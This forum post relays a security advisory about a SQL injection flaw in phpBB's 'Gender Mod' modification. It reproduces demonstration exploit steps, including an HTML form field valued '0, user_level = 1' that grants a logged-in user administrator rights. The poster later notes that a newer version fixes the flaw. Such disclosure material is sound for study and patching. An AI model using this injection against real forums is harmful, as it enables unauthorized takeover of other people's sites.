I found this post recently...
A vulnerability was reported in the phpBB bulletin board software. When used with the 'Gender Mod' modification, a remote authenticated user can gain administrative privileges on the forum.
It is reported that Gender Mod contains an input validation flaw that allows remote authenticated users to inject SQL fields into the UPDATE sql command. A remote user can assign the value 'user_level = 1' to gain administrator privileges on the bulletin board.
The following demonstration exploit steps are provided:
1. Save the User Profile page into your disk to modify it offline.
2. Add the correct full post action address (http://forum.victim.com/...):
<FORM action=http://forum.victim.com/profile.php?sid=<current_session_id> method=post encType=multipart/form-data>
3. Modify the HTML Form so that the input field "gender" has value like:
<input type=text name=gender value="0, user_level = 1 ">
4. Load this page in the same browser window where the cookie is still available.
Then, hit 'Submit' to change the user profile.
The vendor has reportedly been notified.
http://www.phpadvisory.com/advisories/view.phtml?ID=52
Edit: nevermind. I see that the latest version fixes this.
